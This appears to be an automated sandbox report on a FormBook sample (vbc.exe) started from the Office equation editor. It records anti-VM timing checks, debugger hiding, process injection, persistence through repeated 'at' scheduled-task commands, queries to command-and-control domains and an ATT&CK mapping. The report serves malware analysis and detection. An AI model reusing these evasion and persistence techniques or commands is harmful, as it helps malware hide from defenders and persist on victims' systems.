Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D5908 second address: 00000000003D4BD7 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test cx, cx 0x0000000e ret 0x0000000f jmp 00007FEA5874D72Eh 0x00000011 cmp cx, bx 0x00000014 call 00007FEA58750AB3h 0x00000019 mov eax, dword ptr fs:[00000030h] 0x0000001f mov eax, dword ptr [eax+10h] 0x00000022 add eax, 40h 0x00000025 add eax, 04h 0x00000028 mov eax, dword ptr [eax] 0x0000002a ret 0x0000002b mov dword ptr [ebp+4Ch], eax 0x0000002e cmp ebx, ecx 0x00000030 call 00007FEA587511BCh 0x00000035 push dword ptr [ebp+20h] 0x00000038 pop dword ptr [ebp+0000012Ch] 0x0000003e mov dword ptr [ebp+68h], 00000000h 0x00000045 jmp 00007FEA5874EA30h 0x0000004a call 00007FEA5874C409h 0x0000004f jmp 00007FEA5874D732h 0x00000051 pushad 0x00000052 mov edi, 00000036h 0x00000057 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003DA4D8 second address: 00000000003DA4D8 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp edx, dword ptr [ebp+44h] 0x00000006 jne 00007FEA5877F455h 0x00000008 jmp 00007FEA5877F4FEh 0x0000000a test edi, 9279C6F4h 0x00000010 sub edx, 04h 0x00000013 xor dword ptr [edx], ecx 0x00000015 jmp 00007FEA5877F506h 0x00000017 pushad 0x00000018 mov edx, 000000C6h 0x0000001d rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D3F33 second address: 00000000003D3F33 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D3FF5 second address: 00000000003D3FF5 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000001B8806 second address: 00000000001B8806 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FEA5874DF0Ch 0x0000001d popad 0x0000001e call 00007FEA5874D886h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000001B5908 second address: 00000000001B4BD7 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test cx, cx 0x0000000e ret 0x0000000f jmp 00007FEA5877F4FEh 0x00000011 cmp cx, bx 0x00000014 call 00007FEA58782883h 0x00000019 mov eax, dword ptr fs:[00000030h] 0x0000001f mov eax, dword ptr [eax+10h] 0x00000022 add eax, 40h 0x00000025 add eax, 04h 0x00000028 mov eax, dword ptr [eax] 0x0000002a ret 0x0000002b mov dword ptr [ebp+4Ch], eax 0x0000002e cmp ebx, ecx 0x00000030 call 00007FEA58782F8Ch 0x00000035 push dword ptr [ebp+20h] 0x00000038 pop dword ptr [ebp+0000012Ch] 0x0000003e mov dword ptr [ebp+68h], 00000000h 0x00000045 jmp 00007FEA58780800h 0x0000004a call 00007FEA5877E1D9h 0x0000004f jmp 00007FEA5877F502h 0x00000051 pushad 0x00000052 mov edi, 00000036h 0x00000057 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000001BA4D8 second address: 00000000001BA4D8 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp edx, dword ptr [ebp+44h] 0x00000006 jne 00007FEA5874D685h 0x00000008 jmp 00007FEA5874D72Eh 0x0000000a test edi, 9279C6F4h 0x00000010 sub edx, 04h 0x00000013 xor dword ptr [edx], ecx 0x00000015 jmp 00007FEA5874D736h 0x00000017 pushad 0x00000018 mov edx, 000000C6h 0x0000001d rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\Public\vbc.exe

Code function: 5_2_003D0DDA rdtsc

5_2_003D0DDA

Source: C:\Windows\system\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\mrsys.exe			Jump to dropped file
Source: C:\Windows\system\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\stsys.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2904	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Windows\system\explorer.exe TID: 1688	Thread sleep count: 55 > 30	Jump to behavior
Source: C:\Windows\system\explorer.exe TID: 2828	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\system\svchost.exe TID: 2112	Thread sleep time: -1260000s >= -30000s	Jump to behavior
Source: C:\Windows\system\svchost.exe TID: 620	Thread sleep count: 97 > 30	Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 2840	Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2064	Thread sleep time: -120000s >= -30000s

Source: spoolsv.exe, 00000009.00000003.2182541924.00000000005DC000.00000004.00000001.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: vbc.exe	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Source: C:\Users\user\AppData\Local\icsys.icn.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process queried: DebugPort
Source: C:\Users\Public\vbc.exe	Process queried: DebugPort

Source: C:\Users\Public\vbc.exe

Code function: 5_2_003D0DDA rdtsc

5_2_003D0DDA

Source: C:\Users\Public\vbc.exe

Code function: 18_2_1EB1FEA0 NtReadVirtualMemory,LdrInitializeThunk,

18_2_1EB1FEA0

Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D906B mov eax, dword ptr fs:[00000030h]	5_2_003D906B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D7EE5 mov eax, dword ptr fs:[00000030h]	5_2_003D7EE5
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D4443 mov eax, dword ptr fs:[00000030h]	5_2_003D4443
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D90B7 mov eax, dword ptr fs:[00000030h]	5_2_003D90B7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D90AB mov eax, dword ptr fs:[00000030h]	5_2_003D90AB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D6C83 mov eax, dword ptr fs:[00000030h]	5_2_003D6C83
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D90F7 mov eax, dword ptr fs:[00000030h]	5_2_003D90F7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D9137 mov eax, dword ptr fs:[00000030h]	5_2_003D9137
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3168 mov eax, dword ptr fs:[00000030h]	5_2_003D3168
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3166 mov eax, dword ptr fs:[00000030h]	5_2_003D3166
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D31AF mov eax, dword ptr fs:[00000030h]	5_2_003D31AF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D2E3F mov eax, dword ptr fs:[00000030h]	5_2_003D2E3F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D2651 mov eax, dword ptr fs:[00000030h]	5_2_003D2651
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D7F4B mov eax, dword ptr fs:[00000030h]	5_2_003D7F4B
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB326F8 mov eax, dword ptr fs:[00000030h]	18_2_1EB326F8
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B906B mov eax, dword ptr fs:[00000030h]	18_2_001B906B
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B90B7 mov eax, dword ptr fs:[00000030h]	18_2_001B90B7
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B90AB mov eax, dword ptr fs:[00000030h]	18_2_001B90AB
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B90F7 mov eax, dword ptr fs:[00000030h]	18_2_001B90F7
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B9137 mov eax, dword ptr fs:[00000030h]	18_2_001B9137
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B4413 mov eax, dword ptr fs:[00000030h]	18_2_001B4413
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B4415 mov eax, dword ptr fs:[00000030h]	18_2_001B4415
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B6C83 mov eax, dword ptr fs:[00000030h]	18_2_001B6C83
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B7EE5 mov eax, dword ptr fs:[00000030h]	18_2_001B7EE5
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B7F4B mov eax, dword ptr fs:[00000030h]	18_2_001B7F4B

Source: C:\Users\Public\vbc.exe

Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Early bird code injection technique detected

Show sources

Source: C:\Users\user\AppData\Local\icsys.icn.exe

Process created / APC Queued / Resumed: C:\Windows\system\explorer.exe

Jump to behavior

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\system\explorer.exe	Domain query: vccmd01.googlecode.com
Source: C:\Windows\system\explorer.exe	Domain query: vccmd02.googlecode.com
Source: C:\Windows\system\explorer.exe	Network Connect: 74.125.143.82 80	Jump to behavior
Source: C:\Windows\system\explorer.exe	Domain query: vccmd01.zxq.net
Source: C:\Windows\system\explorer.exe	Domain query: vccmd03.googlecode.com
Source: C:\Windows\system\explorer.exe	Domain query: vccmd01.t35.com

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\system\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe

Thread register set: target process: 1388

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe c:\users\public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\icsys.icn.exe C:\Users\user\AppData\Local\icsys.icn.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe c:\users\public\vbc.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\system\explorer.exe c:\windows\system\explorer.exe	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process created: C:\Windows\system\spoolsv.exe c:\windows\system\spoolsv.exe SE	Jump to behavior
Source: C:\Windows\system\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process created: C:\Windows\system\svchost.exe c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\system\spoolsv.exe c:\windows\system\spoolsv.exe PR	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:50 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:51 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:53 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:55 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:57 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:59 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:03 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:05 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:07 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:13 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: unknown unknown

Source: C:\Users\Public\vbc.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0041E9D0 __vbaChkstk,__vbaOnError,#525,__vbaStrMove,__vbaLenBstr,__vbaStrToAnsi,GetUserNameA,__vbaStrToUnicode,__vbaFreeStr,#537,__vbaStrMove,__vbaInStr,#616,__vbaStrMove,__vbaFreeStr,__vbaFreeStr,__vbaErrorOverflow,

4_2_0041E9D0

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\Public\vbc.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Blob

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution13	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	Credential API Hooking1	Account Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer14	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter1	Scheduled Task/Job1	Extra Window Memory Injection1	Deobfuscate/Decode Files or Information1	Input Capture111	File and Directory Discovery1	Remote Desktop Protocol	Credential API Hooking1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scheduled Task/Job1	Registry Run Keys / Startup Folder1	Process Injection411	Obfuscated Files or Information31	Security Account Manager	System Information Discovery213	SMB/Windows Admin Shares	Input Capture111	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Scheduled Task/Job1	Software Packing1	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol124	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder1	DLL Side-Loading1	LSA Secrets	Security Software Discovery521	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	File Deletion1	Cached Domain Credentials	Virtualization/Sandbox Evasion22	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Extra Window Memory Injection1	DCSync	Process Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rootkit1	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading341	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Virtualization/Sandbox Evasion22	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Process Injection411	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Hidden Files and Directories1	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
